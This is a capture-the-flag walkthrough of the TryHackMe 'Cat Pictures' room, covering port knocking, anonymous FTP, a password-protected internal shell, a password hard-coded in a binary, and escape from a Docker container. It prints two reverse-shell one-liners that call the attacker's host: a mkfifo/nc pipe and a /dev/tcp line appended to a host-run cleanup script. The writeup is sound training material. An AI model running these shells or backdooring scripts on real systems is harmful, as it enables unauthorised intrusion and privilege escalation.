Cat Pictures — Tryhackme CTF Writeup

bagiyev
Jun 6, 2021

NMAP

Let’s start with an Nmap scan to identify the list of services running on the system.

nmap -sV -p- -vv 10.10.147.150

PORT     STATE SERVICE      REASON  VERSION
22/tcp   open  ssh          syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
4420/tcp open  nvm-express? syn-ack
8080/tcp open  http         syn-ack Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)

Note the question mark on port 4420: Nmap could not fingerprint the service and only matched the port number against its table, so "nvm-express" is a guess. We will find out what actually listens there later.

Web server

There is a web server on port 8080 hosting a forum powered by phpBB. I have checked the known exploits and vulnerabilities for phpBB, but none of them seemed to work for this one.

Port knocking

One of the forum posts contains the keyword “Knock” together with the sequence 1111, 2222, 3333, 4444. Here is a short overview of port knocking.

Port knocking is a firewall-level technique for hiding a service. The service's port stays closed or filtered until a client sends connection attempts to a predefined sequence of (closed) ports in the right order; a daemon such as knockd watches those attempts and, when the sequence matches, adds a firewall rule that opens the real port for the knocking client. A port scan on its own therefore never sees the service. In this case, if port 21 is the protected port, it is only opened after we hit ports 1111, 2222, 3333 and 4444 in that order.

./knock 10.10.147.150 1111 2222 3333 4444

I recommend knocking a few times, as sometimes it does not work.
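The same procedure as the knock command above, with the verification step built in, as an added example that is not part of the original writeup: it knocks, waits for the firewall rule to appear, checks whether the protected port answers, and retries a few times. It assumes the knock daemon reacts to TCP connection attempts (knockd's default) and that the protected service is FTP on port 21; the target address is the writeup's and is only a placeholder.

```python
#!/usr/bin/env python3
"""Knock, then verify that the protected port actually opened.

Added example, not from the original writeup. Assumptions: the knock daemon
reacts to TCP connection attempts (knockd's default), the protected service
is FTP on port 21, and the sequence is the one found on the forum. The host
below is the writeup's target and is only a placeholder.
"""
import socket
import time

HOST = "10.10.147.150"
SEQUENCE = (1111, 2222, 3333, 4444)
PROTECTED_PORT = 21


def tap(host, port, timeout=0.3):
    """One connection attempt; the SYN alone is what the knock daemon sees.

    The knock ports are closed or filtered, so a refused or timed-out
    connection is the expected outcome and is ignored on purpose.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except OSError:
        pass
    finally:
        s.close()


def is_open(host, port, timeout=1.0):
    """True if a full TCP handshake to host:port succeeds."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return True
    except OSError:
        return False
    finally:
        s.close()


def knock(host, sequence, delay=0.2):
    """Hit the ports in order, pausing between knocks.

    knockd tracks the sequence per source address and resets it on a wrong
    or out-of-order hit, so order matters; the pauses keep the SYNs from
    arriving reordered while staying well under the daemon's sequence
    timeout (10 s by default).
    """
    for port in sequence:
        tap(host, port)
        time.sleep(delay)


def knock_until_open(host, sequence, protected_port, attempts=3, settle=1.0):
    """Knock, give the firewall time to add its rule, and check the port.

    Returns the attempt number on which the port was seen open, or 0 if it
    never opened within the given number of attempts (the "knock a few
    times" advice above, automated).
    """
    for attempt in range(1, attempts + 1):
        knock(host, sequence)
        time.sleep(settle)
        if is_open(host, protected_port):
            return attempt
    return 0


if __name__ == "__main__":
    n = knock_until_open(HOST, SEQUENCE, PROTECTED_PORT)
    print(f"port {PROTECTED_PORT} open after attempt {n}" if n else "knock failed")
```

If the daemon is configured for UDP knocks, tap() has to send a datagram (SOCK_DGRAM) instead of a TCP connect; and because knockd opens the port only for the source address it saw, the check must come from the same machine that knocked.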

FTP

After knocking, we run the Nmap scan again to see whether a new port has opened.

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
4420/tcp open nvm-express
8080/tcp open http-proxy

Let's see if we can access FTP with anonymous credentials.

There is a text file called note.txt; we can download and read it.

cat note.txt
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.
Connect to port 4420, the password is sa*********.
- ca*****r

Initial access — Port 4420

Wow, we got the credentials for the service on port 4420, which is not NVMe at all but a custom "internal shell service".

nc 10.10.147.150 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
sa*********
Password accepted

We have a shell, but it is very limited (no cd, no Ctrl-C), so let's use it to spawn a proper reverse shell. First start a listener on the attacking machine:

nc -lvnp 4442

Then, inside the port 4420 shell, run the following ($myip is the attacking machine's IP address):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $myip 4442 >/tmp/f

There is a binary called runme in the home directory of our user. When we run it, it asks for a password.

You can reverse engineer that binary to find the password, but the password is stored in it as a plain string, so the easiest option was to simply output the binary using ‘cat’.

cat /home/ca*****/runme
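Why dumping the binary works, as an added example that is not part of the original writeup: a password checked with a plain string comparison ends up as a NUL-terminated literal in the binary's read-only data, usually right next to the prompt that asks for it, and a `strings`-style scan pulls it straight out. The code below re-implements the core of `strings` and flags literals that sit next to password-related text. The sample bytes are constructed to mimic such a program; "hunter2" is a made-up password, not the one on the target.

```python
#!/usr/bin/env python3
"""Recover a hard-coded password from a binary by extracting its strings.

Added example, not code from the original writeup. It re-implements the
core of the `strings` tool so it is clear why simply dumping runme works:
a password compared with strcmp() is stored as a plain NUL-terminated
literal in .rodata, usually right next to the prompt that asks for it.
SAMPLE_BINARY is constructed to mimic such a program; "hunter2" is a
made-up password, not the one on the target.
"""
import re
import sys

KEYWORDS = ("pass", "key", "secret", "token")

# Constructed sample: ELF magic, a few bytes that look like code, then the
# string literals a compiler would lay out in .rodata in source order.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"\x02\x00\x3e\x00\x01\x00\x00\x00"
    + b"\x48\x83\xec\x08\xe8\x00\x00\x00\x00\x31\xc0\xc3"
    + b"Enter password: \x00"
    + b"hunter2\x00"
    + b"Password accepted\x00"
    + b"-----BEGIN OPENSSH PRIVATE KEY-----\x00"
    + b"\x00\x00GCC: (Ubuntu 7.5.0) 7.5.0\x00"
)


def extract_strings(data, min_len=4):
    """Like `strings -n min_len`: runs of printable ASCII (0x20-0x7e) of at
    least min_len bytes; anything else, including the NUL terminators,
    separates them."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def candidate_secrets(strings, window=2):
    """Pair every string that mentions a password-like keyword with the
    `window` strings following it. The literal the program compares against
    is typically emitted right after the prompt, so the neighbours of a
    prompt are the first place to look."""
    hits = []
    for i, s in enumerate(strings):
        if any(k in s.lower() for k in KEYWORDS):
            hits.append((s, strings[i + 1:i + 1 + window]))
    return hits


def main(argv):
    # Read a real file if one is given, otherwise analyse the constructed sample.
    data = open(argv[1], "rb").read() if len(argv) > 1 else SAMPLE_BINARY
    for prompt, neighbours in candidate_secrets(extract_strings(data)):
        print(f"{prompt!r} -> {neighbours}")


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python3 find_secret.py /home/<user>/runme` on a copy of the binary. The caveat: this only finds passwords stored verbatim. If the program decodes or computes the password at runtime, the scan shows nothing useful and the next step is ltrace (to watch the strcmp call) or a disassembler.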

User flag

Entering the correct password prints an SSH private key. Save it as id_rsa, restrict its permissions (ssh refuses to use a key that other users can read) and log in with it:

chmod 600 id_rsa 
ssh ca*****@10.10.147.150 -i id_rsa

We get our first flag in /root/flag.txt. Note that this /root belongs to the Docker container we are in, not to the host: we are root inside a container, not on the real machine.

Root flag

Now we are root inside the Docker container. Without running any automated tools, I first checked the .bash_history.

It mentions a file called /opt/clean/clean.sh, which looks like the key to the next step. Let's look at its contents.

root@7546fa2336d6:/# cat /opt/clean/clean.sh 
#!/bin/bash
rm -rf /tmp/*

A script that wipes /tmp is exactly what a periodic cron job looks like, and if it is executed from outside the container it is our way out. To find out whether, and where, it gets run, append a reverse shell to /opt/clean/clean.sh, keep a listener on port 8888 on the attacking machine (as before, $myip is the attacker's IP address), and wait.

echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/$myip/8888 0>&1'" >> /opt/clean/clean.sh

Great! After a little bit of waiting, we got a root shell.
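A check worth doing before relying on the step above, as an added example that is not part of the original writeup: whether /opt/clean/clean.sh lives on the container's own overlay filesystem or on a bind mount from the host, because only a file the host can see can be picked up by a cron job running outside the container. /proc/self/mountinfo lists every mount the process sees; the code parses it and reports what backs a given path. SAMPLE_MOUNTINFO is constructed to look like a Docker container with /opt/clean bind-mounted from the host's root filesystem (the container ID is the one from the prompt above; device names and overlay paths are made up).

```python
#!/usr/bin/env python3
"""Find out what a path inside a container is really backed by.

Added example, not from the original writeup. Before appending anything to
/opt/clean/clean.sh it is worth knowing whether that file lives on the
container's own overlay filesystem or on a bind mount from the host; only in
the latter case could a cron job outside the container pick up the change.
/proc/self/mountinfo lists every mount the process can see. SAMPLE_MOUNTINFO
is constructed to look like a Docker container with /opt/clean bind-mounted
from the host's root filesystem; the device names and overlay paths are made
up.
"""
import re

SAMPLE_MOUNTINFO = """\
1157 1117 0:160 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/AAA:/var/lib/docker/overlay2/l/BBB,upperdir=/var/lib/docker/overlay2/123/diff,workdir=/var/lib/docker/overlay2/123/work
1158 1157 0:163 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
1159 1157 0:164 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
1162 1157 8:1 /opt/clean /opt/clean rw,relatime - ext4 /dev/sda1 rw
1163 1157 8:1 /var/lib/docker/containers/7546fa2336d6/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw
"""

_OCTAL = re.compile(r"\\([0-7]{3})")


def _unescape(field):
    """mountinfo escapes spaces, tabs and backslashes as \\040, \\011, \\134."""
    return _OCTAL.sub(lambda m: chr(int(m.group(1), 8)), field)


def parse_mountinfo(text):
    """Parse /proc/self/mountinfo lines into dicts.

    Format: id parent major:minor root mount_point options [optional...] - fstype source superopts
    The optional fields have no fixed count, so split on the " - " separator first.
    """
    mounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        left, _, right = line.partition(" - ")
        lf = left.split()
        rf = right.split()
        mounts.append({
            "root": _unescape(lf[3]),          # path on the source fs that is mounted here
            "mount_point": _unescape(lf[4]),
            "fstype": rf[0],
            "source": _unescape(rf[1]),
        })
    return mounts


def mount_for(path, mounts):
    """Return the mount entry whose mount point is the longest prefix of path."""
    best = None
    for m in mounts:
        mp = m["mount_point"]
        # "/" becomes the prefix "/", so the root mount matches every absolute path
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best["mount_point"]):
                best = m
    return best


def describe(path, mounts):
    """Classify where a path's bytes live."""
    m = mount_for(path, mounts)
    if m is None:
        return "unknown: no mount covers this path"
    if m["fstype"] == "overlay":
        return "overlay: container filesystem; writes stay inside the container"
    if m["root"] != "/":
        # A non-root "root" field means a sub-tree of another filesystem was
        # bind-mounted here: the classic docker -v /host/dir:/container/dir.
        return f"bind mount: host path {m['root']} on {m['source']} ({m['fstype']})"
    return f"{m['fstype']} mount of {m['source']}"


if __name__ == "__main__":
    try:
        text = open("/proc/self/mountinfo").read()   # real data when run inside the container
    except OSError:
        text = SAMPLE_MOUNTINFO
    mounts = parse_mountinfo(text)
    for p in ("/opt/clean/clean.sh", "/tmp/f", "/etc/resolv.conf"):
        print(p, "->", describe(p, mounts))
```

A named Docker volume shows up the same way, with a root under /var/lib/docker/volumes/ on the host, which is just as visible to a host-side cron job. If the script instead lives on the overlay, nothing outside the container will execute what you append to it, and the wait for a callback would be pointless.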
